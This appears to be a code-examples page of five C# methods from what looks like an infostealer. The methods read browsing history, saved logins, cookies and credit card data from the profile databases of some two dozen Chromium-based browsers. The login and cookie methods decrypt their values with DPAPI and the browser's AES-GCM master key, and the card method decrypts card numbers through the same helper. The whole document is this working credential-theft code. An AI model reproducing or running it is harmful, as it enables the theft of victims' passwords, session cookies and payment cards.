Ejemplo n.º 1
0
        // Return list with arrays (url, title, visits, time)
        public static List <string[]> get()
        {
            // Path info
            string a_a = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\";
            string l_a = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "\\";
            string u_s = "\\User Data\\Default\\History";

            // Browsers list
            string[] chromiumBasedBrowsers = new string[]
            {
                l_a + "Google\\Chrome" + u_s,
                l_a + "Google(x86)\\Chrome" + u_s,
                l_a + "Chromium" + u_s,
                a_a + "Opera Software\\Opera Stable\\History",
                l_a + "BraveSoftware\\Brave-Browser" + u_s,
                l_a + "Epic Privacy Browser" + u_s,
                l_a + "Amigo" + u_s,
                l_a + "Vivaldi" + u_s,
                l_a + "Orbitum" + u_s,
                l_a + "Mail.Ru\\Atom" + u_s,
                l_a + "Kometa" + u_s,
                l_a + "Comodo\\Dragon" + u_s,
                l_a + "Torch" + u_s,
                l_a + "Comodo" + u_s,
                l_a + "Slimjet" + u_s,
                l_a + "360Browser\\Browser" + u_s,
                l_a + "Maxthon3" + u_s,
                l_a + "K-Melon" + u_s,
                l_a + "Sputnik\\Sputnik" + u_s,
                l_a + "Nichrome" + u_s,
                l_a + "CocCoc\\Browser" + u_s,
                l_a + "uCozMedia\\Uran" + u_s,
                l_a + "Chromodo" + u_s,
                l_a + "Yandex\\YandexBrowser" + u_s
            };

            List <string[]> history = new List <string[]>();
            // Database
            string tempHistoryLocation = "";

            // Search all browsers
            foreach (string browser in chromiumBasedBrowsers)
            {
                if (File.Exists(browser))
                {
                    tempHistoryLocation = Environment.GetEnvironmentVariable("temp") + "\\browserHistory";
                    if (File.Exists(tempHistoryLocation))
                    {
                        File.Delete(tempHistoryLocation);
                    }
                    File.Copy(browser, tempHistoryLocation);
                }
                else
                {
                    continue;
                }

                // Read chrome database
                cSQLite sSQLite = new cSQLite(tempHistoryLocation);
                sSQLite.ReadTable("urls");

                for (int i = 0; i < sSQLite.GetRowCount(); i++)
                {
                    // Get data from database
                    string url    = Convert.ToString(sSQLite.GetValue(i, 1));
                    string title  = Convert.ToString(sSQLite.GetValue(i, 2));
                    string visits = Convert.ToString(Convert.ToInt32(sSQLite.GetValue(i, 3)) + 1);
                    string time   = Convert.ToString(TimeZoneInfo.ConvertTimeFromUtc(DateTime.FromFileTimeUtc(10 * Convert.ToInt64(sSQLite.GetValue(i, 5))), TimeZoneInfo.Local));


                    // If no data => break
                    if (string.IsNullOrEmpty(url))
                    {
                        break;
                    }
                    string[] credentials = new string[4]
                    {
                        url,
                        Crypt.toUTF8(title),
                        visits,
                        time
                    };
                    history.Add(credentials);
                    continue;
                }
                continue;
            }
            return(history);
        }
Ejemplo n.º 2
0
        // Return list with arrays (hostname, usesrname, password)
        public static List <string[]> get()
        {
            // Path info
            string a_a = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\";
            string l_a = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "\\";
            string u_s = "\\User Data\\Default\\Login Data";

            // Browsers list
            string[] chromiumBasedBrowsers = new string[]
            {
                l_a + "Google\\Chrome" + u_s,
                l_a + "Google(x86)\\Chrome" + u_s,
                l_a + "Chromium" + u_s,
                a_a + "Opera Software\\Opera Stable\\Login Data",
                l_a + "BraveSoftware\\Brave-Browser" + u_s,
                l_a + "Epic Privacy Browser" + u_s,
                l_a + "Amigo" + u_s,
                l_a + "Vivaldi" + u_s,
                l_a + "Orbitum" + u_s,
                l_a + "Mail.Ru\\Atom" + u_s,
                l_a + "Kometa" + u_s,
                l_a + "Comodo\\Dragon" + u_s,
                l_a + "Torch" + u_s,
                l_a + "Comodo" + u_s,
                l_a + "Slimjet" + u_s,
                l_a + "360Browser\\Browser" + u_s,
                l_a + "Maxthon3" + u_s,
                l_a + "K-Melon" + u_s,
                l_a + "Sputnik\\Sputnik" + u_s,
                l_a + "Nichrome" + u_s,
                l_a + "CocCoc\\Browser" + u_s,
                l_a + "uCozMedia\\Uran" + u_s,
                l_a + "Chromodo" + u_s,
                l_a + "Yandex\\YandexBrowser" + u_s
            };

            List <string[]> passwords = new List <string[]>();
            // Database
            string tempDatabaseLocation = "";


            // Search all browsers
            foreach (string browser in chromiumBasedBrowsers)
            {
                if (File.Exists(browser))
                {
                    tempDatabaseLocation = Environment.GetEnvironmentVariable("temp") + "\\browserPasswords";
                    if (File.Exists(tempDatabaseLocation))
                    {
                        File.Delete(tempDatabaseLocation);
                    }
                    File.Copy(browser, tempDatabaseLocation);
                }
                else
                {
                    continue;
                }

                // Read chrome database
                cSQLite sSQLite = new cSQLite(tempDatabaseLocation);
                sSQLite.ReadTable("logins");

                for (int i = 0; i < sSQLite.GetRowCount(); i++)
                {
                    // Get data from database
                    string hostname = sSQLite.GetValue(i, 0);
                    string username = sSQLite.GetValue(i, 3);
                    string password = sSQLite.GetValue(i, 5);

                    // If no data => break
                    if (string.IsNullOrEmpty(password))
                    {
                        break;
                    }

                    // Show credentials
                    string[] credentials = new string[3]
                    {
                        hostname,
                        Crypt.toUTF8(username),
                        Crypt.toUTF8(Crypt.decryptChrome(password, browser))
                    };
                    passwords.Add(credentials);
                    continue;
                }
                continue;
            }
            return(passwords);
        }
Ejemplo n.º 3
0
        // Return list with arrays (hostname, usesrname, password)
        public static List <string[]> getPasswords()
        {
            // Check dll's before decryption chromium passwords
            checkDlls();
            // Create list
            List <string[]> passwords = new List <string[]>();
            // Path info
            string a_a = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\";
            string l_a = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "\\";
            string u_s = "\\User Data\\Default\\Login Data";
            // Database
            string tempDatabaseLocation = "";

            // Browsers list
            string[] chromiumBasedBrowsers = new string[]
            {
                l_a + "Google\\Chrome" + u_s,
                l_a + "Google(x86)\\Chrome" + u_s,
                l_a + "Chromium" + u_s,
                a_a + "Opera Software\\Opera Stable\\Login Data",
                l_a + "BraveSoftware\\Brave-Browser" + u_s,
                l_a + "Epic Privacy Browser" + u_s,
                l_a + "Amigo" + u_s,
                l_a + "Vivaldi" + u_s,
                l_a + "Orbitum" + u_s,
                l_a + "Mail.Ru\\Atom" + u_s,
                l_a + "Kometa" + u_s,
                l_a + "Comodo\\Dragon" + u_s,
                l_a + "Torch" + u_s,
                l_a + "Comodo" + u_s,
                l_a + "Slimjet" + u_s,
                l_a + "360Browser\\Browser" + u_s,
                l_a + "Maxthon3" + u_s,
                l_a + "K-Melon" + u_s,
                l_a + "Sputnik\\Sputnik" + u_s,
                l_a + "Nichrome" + u_s,
                l_a + "CocCoc\\Browser" + u_s,
                l_a + "uCozMedia\\Uran" + u_s,
                l_a + "Chromodo" + u_s,
                l_a + "Yandex\\YandexBrowser" + u_s
            };

            // Search all browsers
            foreach (string browser in chromiumBasedBrowsers)
            {
                if (File.Exists(browser))
                {
                    tempDatabaseLocation = Environment.GetEnvironmentVariable("temp") + "\\browserDatabase";
                    if (File.Exists(tempDatabaseLocation))
                    {
                        File.Delete(tempDatabaseLocation);
                    }
                    File.Copy(browser, tempDatabaseLocation);
                }
                else
                {
                    continue;
                }

                // Read chrome database
                cSQLite sSQLite = new cSQLite(tempDatabaseLocation);
                sSQLite.ReadTable("logins");

                for (int i = 0; i < sSQLite.GetRowCount(); i++)
                {
                    // Get data from database
                    string hostname = sSQLite.GetValue(i, 0);
                    string username = sSQLite.GetValue(i, 3);
                    string password = sSQLite.GetValue(i, 5);

                    // If no data => break
                    if (string.IsNullOrEmpty(password))
                    {
                        break;
                    }

                    // If Chromium version > 80
                    if (password.StartsWith("v10") || password.StartsWith("v11"))
                    {
                        // Get masterkey location
                        string masterKey, masterKeyPath = "";
                        foreach (string l_s in new string[] { "", "\\..", "\\..\\.." })
                        {
                            masterKeyPath = Path.GetDirectoryName(browser) + l_s + "\\Local State";
                            if (File.Exists(masterKeyPath))
                            {
                                break;
                            }
                            else
                            {
                                masterKeyPath = null;
                                continue;
                            }
                        }
                        // If masterKey location file not found.
                        if (string.IsNullOrEmpty(masterKeyPath))
                        {
                            break;
                        }
                        // Get master key
                        masterKey = File.ReadAllText(masterKeyPath);
                        string[] lines = System.Text.RegularExpressions.Regex.Split(masterKey, "\"");
                        int      index = 0;
                        foreach (string line in lines)
                        {
                            if (line == "encrypted_key")
                            {
                                masterKey = lines[index + 2];
                                break;
                            }
                            index++;
                        }
                        // Decrypt master key
                        byte[] keyBytes       = Encoding.Default.GetBytes(Encoding.Default.GetString(Convert.FromBase64String(masterKey)).Remove(0, 5));
                        byte[] masterKeyBytes = DPAPI.Decrypt(keyBytes, null, out string _);
                        byte[] bytePassword   = Encoding.Default.GetBytes(password).ToArray();
                        // Decrypt password by master-key
                        byte[] iv                = bytePassword.Skip(3).Take(12).ToArray(); // From 3 to 15
                        byte[] payload           = bytePassword.Skip(15).ToArray();         // from 15 to end
                        string decryptedPassword = Encoding.Default.GetString(Sodium.SecretAeadAes.Decrypt(payload, iv, masterKeyBytes));
                        // Show credentials
                        string[] credentials = new string[3]
                        {
                            hostname,
                            username,
                            decryptedPassword
                        };
                        passwords.Add(credentials);
                        continue;

                        // If Chromium version < 80
                    }
                    else
                    {
                        // Decrypt password
                        string decryptedPassword = Encoding.Default.GetString(DPAPI.Decrypt(Encoding.Default.GetBytes(password), null, out string _));
                        // Show credentials
                        string[] credentials = new string[3]
                        {
                            hostname,
                            username,
                            decryptedPassword
                        };
                        passwords.Add(credentials);
                        continue;
                    }
                }
                continue;
            }
            return(passwords);
        }
Ejemplo n.º 4
0
        // Return list with arrays (value, hostKey, name, path, expires, isSecure)
        public static List <string[]> get()
        {
            // Path info
            string a_a = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\";
            string l_a = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "\\";
            string u_s = "\\User Data\\Default\\Cookies";

            // Browsers list
            string[] chromiumBasedBrowsers = new string[]
            {
                l_a + "Google\\Chrome" + u_s,
                l_a + "Google(x86)\\Chrome" + u_s,
                l_a + "Chromium" + u_s,
                a_a + "Opera Software\\Opera Stable\\Cookies",
                l_a + "BraveSoftware\\Brave-Browser" + u_s,
                l_a + "Epic Privacy Browser" + u_s,
                l_a + "Amigo" + u_s,
                l_a + "Vivaldi" + u_s,
                l_a + "Orbitum" + u_s,
                l_a + "Mail.Ru\\Atom" + u_s,
                l_a + "Kometa" + u_s,
                l_a + "Comodo\\Dragon" + u_s,
                l_a + "Torch" + u_s,
                l_a + "Comodo" + u_s,
                l_a + "Slimjet" + u_s,
                l_a + "360Browser\\Browser" + u_s,
                l_a + "Maxthon3" + u_s,
                l_a + "K-Melon" + u_s,
                l_a + "Sputnik\\Sputnik" + u_s,
                l_a + "Nichrome" + u_s,
                l_a + "CocCoc\\Browser" + u_s,
                l_a + "uCozMedia\\Uran" + u_s,
                l_a + "Chromodo" + u_s,
                l_a + "Yandex\\YandexBrowser" + u_s
            };

            List <string[]> cookie = new List <string[]>();
            // Database
            string tempCookieLocation = "";

            // Search all browsers
            foreach (string browser in chromiumBasedBrowsers)
            {
                if (File.Exists(browser))
                {
                    tempCookieLocation = Environment.GetEnvironmentVariable("temp") + "\\browserCookies";
                    if (File.Exists(tempCookieLocation))
                    {
                        File.Delete(tempCookieLocation);
                    }
                    File.Copy(browser, tempCookieLocation);
                }
                else
                {
                    continue;
                }

                // Read chrome database
                cSQLite sSQLite = new cSQLite(tempCookieLocation);
                sSQLite.ReadTable("cookies");

                for (int i = 0; i < sSQLite.GetRowCount(); i++)
                {
                    // Get data from database
                    string value    = sSQLite.GetValue(i, 12);
                    string hostKey  = sSQLite.GetValue(i, 1);
                    string name     = sSQLite.GetValue(i, 2);
                    string path     = sSQLite.GetValue(i, 4);
                    string expires  = Convert.ToString(TimeZoneInfo.ConvertTimeFromUtc(DateTime.FromFileTimeUtc(10 * Convert.ToInt64(sSQLite.GetValue(i, 5))), TimeZoneInfo.Local));
                    string isSecure = sSQLite.GetValue(i, 6).ToUpper();


                    // If no data => break
                    if (string.IsNullOrEmpty(name))
                    {
                        break;
                    }

                    string[] cookies = new string[6]
                    {
                        Crypt.toUTF8(Crypt.decryptChrome(value, browser)),
                        hostKey,
                        Crypt.toUTF8(name),
                        path,
                        expires,
                        isSecure
                    };
                    cookie.Add(cookies);
                    continue;
                }
                continue;
            }
            return(cookie);
        }
Ejemplo n.º 5
0
        // Return list with arrays (number, expYear, expMonth, name)
        public static List <string[]> get()
        {
            // Path info
            string a_a = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\";
            string l_a = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "\\";
            string u_s = "\\User Data\\Default\\Web data";

            // Browsers list
            string[] chromiumBasedBrowsers = new string[]
            {
                l_a + "Google\\Chrome" + u_s,
                l_a + "Google(x86)\\Chrome" + u_s,
                l_a + "Chromium" + u_s,
                // SCARY BUG // a_a + "Opera Software\\Opera Stable\\Web Data",
                l_a + "BraveSoftware\\Brave-Browser" + u_s,
                l_a + "Epic Privacy Browser" + u_s,
                l_a + "Amigo" + u_s,
                l_a + "Vivaldi" + u_s,
                l_a + "Orbitum" + u_s,
                l_a + "Mail.Ru\\Atom" + u_s,
                l_a + "Kometa" + u_s,
                l_a + "Comodo\\Dragon" + u_s,
                l_a + "Torch" + u_s,
                l_a + "Comodo" + u_s,
                l_a + "Slimjet" + u_s,
                l_a + "360Browser\\Browser" + u_s,
                l_a + "Maxthon3" + u_s,
                l_a + "K-Melon" + u_s,
                l_a + "Sputnik\\Sputnik" + u_s,
                l_a + "Nichrome" + u_s,
                l_a + "CocCoc\\Browser" + u_s,
                l_a + "uCozMedia\\Uran" + u_s,
                l_a + "Chromodo" + u_s,
                l_a + "Yandex\\YandexBrowser" + u_s
            };

            List <string[]> creditcard = new List <string[]>();
            // Database
            string tempCCLocation = "";

            // Search all browsers
            foreach (string browser in chromiumBasedBrowsers)
            {
                if (File.Exists(browser))
                {
                    tempCCLocation = Environment.GetEnvironmentVariable("temp") + "\\browserCreditCards";
                    if (File.Exists(tempCCLocation))
                    {
                        File.Delete(tempCCLocation);
                    }
                    File.Copy(browser, tempCCLocation);
                }
                else
                {
                    continue;
                }

                // Read chrome database
                cSQLite sSQLite = new cSQLite(tempCCLocation);
                sSQLite.ReadTable("credit_cards");

                for (int i = 0; i < sSQLite.GetRowCount(); i++)
                {
                    // Get data from database
                    string number   = sSQLite.GetValue(i, 4);
                    string expYear  = sSQLite.GetValue(i, 3);
                    string expMonth = sSQLite.GetValue(i, 2);
                    string name     = sSQLite.GetValue(i, 1);

                    // If no data => break
                    if (string.IsNullOrEmpty(number))
                    {
                        break;
                    }


                    string[] credentials = new string[4]
                    {
                        Crypt.decryptChrome(number, browser),
                        expYear,
                        expMonth,
                        Crypt.toUTF8(name)
                    };
                    creditcard.Add(credentials);
                    continue;
                }
                continue;
            }
            return(creditcard);
        }